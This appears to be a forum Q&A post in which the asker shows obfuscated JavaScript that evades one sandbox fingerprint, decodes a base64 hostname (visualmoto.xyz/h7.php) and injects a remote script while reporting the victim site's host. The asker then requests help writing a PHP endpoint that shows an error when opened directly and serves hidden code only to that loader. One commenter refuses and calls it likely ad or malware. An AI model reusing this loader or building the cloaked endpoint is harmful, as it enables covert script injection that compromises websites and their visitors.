# php show code only if you run on js code and put that php link

Tags: javascript, php

```
if (navigator['userAgent'] == 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.27 Safari/537.36' && screen['width'] == '1024' && screen['height'] == '768') {} else {
    var javas = document['createElement']('script');
    javas['language'] = 'javascript';
    javas['type'] = 'text/javascript';
    javas['src'] = location['protocol'] + '//' + atob('dmlzdWFsbW90by54eXovaDcucGhw') + '?' + Math['floor']((Math['random']() * 1000000000) + 1) + '&h=' + encodeURIComponent(document['location']['host']);
    document['head']['appendChild'](javas)
}
```

need to know how to make an PHP file that will show code inside if i run that link inside this code,  this is the link  dmlzdWFsbW90by54eXovaDcucGhw on 64bit (visualmoto.xyz/h7.php) and open this link  you cant see nothing u see error but when run on that js code that PHP will open an hidden code can you please help me create that h7.php file..  how can i do it i'm very low on php

Comment: Your question does not make any sense. You want to do an `echo file_get_content("http://visualmoto.xyz/h7.php?h=someurl.php");` ?

Comment: no look, i mean i need a php file that shows code on request dont know how he did it but when you open this link http://visualmoto.xyz/h7.php  instantly he shows error when you run it inside that script he will add some extra codes on  site please try to upload on  a host domain and open it and see what he do run it into html <script></script>

Comment: I will do no such thing. Looks like ad or malware

Comment: yes but i need to find  a solution for this :(

Comment: It is likely looking at a header or something he set earlier

Comment: yes but im looking for a code like that example if run php in frame will show code you add inside, if you run normaly that php will show error can you help me with a php code like that?